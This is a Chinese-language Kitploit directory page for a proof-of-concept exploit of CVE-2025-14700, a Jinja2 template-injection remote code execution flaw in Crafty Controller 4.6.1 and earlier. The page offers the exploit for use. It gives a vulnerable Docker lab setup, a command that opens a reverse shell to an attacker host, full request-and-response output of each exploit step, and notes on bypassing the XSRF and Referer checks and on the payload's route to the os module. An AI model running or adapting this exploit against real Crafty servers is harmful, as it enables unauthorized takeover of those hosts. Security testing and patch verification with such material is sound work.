Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC_CVE-2025-14700 — Crafty Controller 中已验证远程代码执行(RCE)的概念验证 | Kitploit
工具/GitHubGitHub/secdongle/poc_cve-2025-14700
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubsecdongle/poc_cve-2025-14700

POC_CVE-2025-14700

Crafty Controller 中已验证远程代码执行(RCE)的概念验证

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-14700

用于 CVE-2025-14700 的概念验证(PoC)利用程序,该漏洞是 Crafty Controller <= 4.6.1 中的一个服务端模板注入(SSTI)漏洞。允许经过身份验证的用户通过向 Webhook 配置中注入恶意 Jinja2 模板来实现远程代码执行(RCE)。

📦 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/secdongle/POC_CVE-2025-14700
cd POC_CVE-2025-14700

🛠️ 测试环境(Docker Compose)

要搭建一个存在漏洞的 Crafty Controller 4.6.1 实例,请使用以下 docker-compose.yml 配置:

1. 创建 docker-compose.yml

root@kitploit:~
version: '3'
services:
  crafty:
    image: registry.gitlab.com/crafty-controller/crafty-4:4.6.1
    container_name: crafty-vulnerable
    ports:
      - "8443:8443"     # Web 管理面板
      - "25565:25565"   # Minecraft 服务器端口
    environment:
      - TZ=Asia/Shanghai
    volumes:
      - ./crafty_data:/crafty_db
    restart: unless-stopped

2. 启动环境

root@kitploit:~
docker-compose up -d

3. 初始化控制器

  1. 通过 https://localhost:8443 访问 Web 界面。
  2. 完成初始配置向导,创建一个管理员账户。
  3. 使用该账户凭证运行 poc.py 脚本。

🚀 使用方法

单目标漏洞利用

root@kitploit:~
# 执行反向 Shell 的概念验证
python3 poc.py -u https://10.67.3.77:8443 -l admin -p '密码' -lh 10.67.3.78 -lp 6699

命令行选项

🎯 漏洞利用功能

  • XSRF 与 Token 同步:自动处理 Tornado _xsrf Cookie 与自定义 token 头之间的复杂同步。
  • 会话模拟:1:1 模拟基于浏览器的请求,包括 Referer 和 Origin 头,以绕过后端安全检查。
  • 自动化链:依次创建虚拟服务器、注入 SSTI 载荷并触发执行操作。

📊 技术分析

该漏洞利用通过匹配后端的严格验证逻辑来实现:

📝 示例输出

root@kitploit:~
python poc.py -u https://10.67.3.77:8443 -l admin -lh 10.67.3.78 -lp 6699 -p 'iMbSnt@OLnBYnU%hVv0aRN2l5djUInSruxAHK2oP0j@QDs$6pkGa8dYEI!G$mLim"'
[*] STEP 1: Visiting login page to retrieve initial _xsrf cookie...
[*] STEP 2: Executing authentication (XSRF: 2|421c9864|03dd...)

================================================================================
[POST] https://10.67.3.77:8443/api/v2/auth/login/ -> HTTP 200
-------------------- [KEY HEADERS VALIDATION] --------------------
X-XSRFToken: 2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
Cookie: _xsrf=2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
Referer: https://10.67.3.77:8443/login?next=%2Fpanel%2Fdashboard
Content-Type: application/json
-------------------- [RESPONSE BODY] -------------------------
{
    "status": "ok",
    "data": {
        "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k",
        "user_id": "1",
        "page": "/panel/dashboard"
    }
}
================================================================================

[*] STEP 3: Creating exploit dummy server...

================================================================================
[POST] https://10.67.3.77:8443/api/v2/servers -> HTTP 201
-------------------- [KEY HEADERS VALIDATION] --------------------
X-XSRFToken: 2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k
Cookie: _xsrf=2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k
Referer: https://10.67.3.77:8443/panel/dashboard
Content-Type: application/json
-------------------- [RESPONSE BODY] -------------------------
{
    "status": "ok",
    "data": {
        "new_server_id": "d21f875b-3db0-42fa-92c7-2ba10cdf13ba"
    }
}
================================================================================

[*] STEP 4: Injecting SSTI Reverse Shell payload...

================================================================================
[POST] https://10.67.3.77:8443/api/v2/servers/d21f875b-3db0-42fa-92c7-2ba10cdf13ba/webhook -> HTTP 200
-------------------- [KEY HEADERS VALIDATION] --------------------
X-XSRFToken: 2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k
Cookie: _xsrf=2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k
Referer: https://10.67.3.77:8443/panel/dashboard
Content-Type: application/json
-------------------- [RESPONSE BODY] -------------------------
{
    "status": "ok",
    "data": {
        "webhook_id": 13
    }
}
================================================================================

[*] STEP 5: Executing protocol-level trigger emulation (Critical Phase)...
[*] Sending start_server action request...

================================================================================
[POST] https://10.67.3.77:8443/api/v2/servers/d21f875b-3db0-42fa-92c7-2ba10cdf13ba/action/start_server -> HTTP 200
-------------------- [KEY HEADERS VALIDATION] --------------------
token: 2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
X-XSRFToken: 2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591
Cookie: _xsrf=2|421c9864|03dd0fa0ae22e9fb5f37bbe035507fd2|1766056591; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJpYXQiOjE3NjYwNTY1OTIsIm1mYSI6ZmFsc2V9.O8Sh-DlvU5CgxSP7oErWwog-lg5WUMiugLw_pnhFE5k
Referer: https://10.67.3.77:8443/panel/dashboard
-------------------- [RESPONSE BODY] -------------------------
{
    "status": "ok"
}
================================================================================

[*] Sending EULA confirmation action request...

[+] POC Execution completed. Check your nc listener (LHOST/LPORT).

反向 Shell

⚠️ 免责声明

本工具仅供 教育和授权的安全测试 使用。未经授权访问计算机系统是非法的。作者不对任何滥用行为负责。

下载工具
选项描述
-u, --url目标 Crafty Controller URL(例如 https://10.67.3.77:8443)
-l, --login身份验证的用户名
-p, --password身份验证的密码
-lh, --lhost攻击者 IP,用于反向 Shell 回调
-lp, --lport攻击者端口,用于反向 Shell 回调
验证要求利用策略
XSRF Token从 Cookie 中提取 _xsrf,并同步设置到 X-XSRFToken 和 token 头。
Referer 检查将 Referer 设置为面板路径,模拟合法用户操作。
头映射将 _xsrf 值映射到操作分发器所需的特定 token 头。
载荷利用 self._TemplateReference__context 访问 os 模块。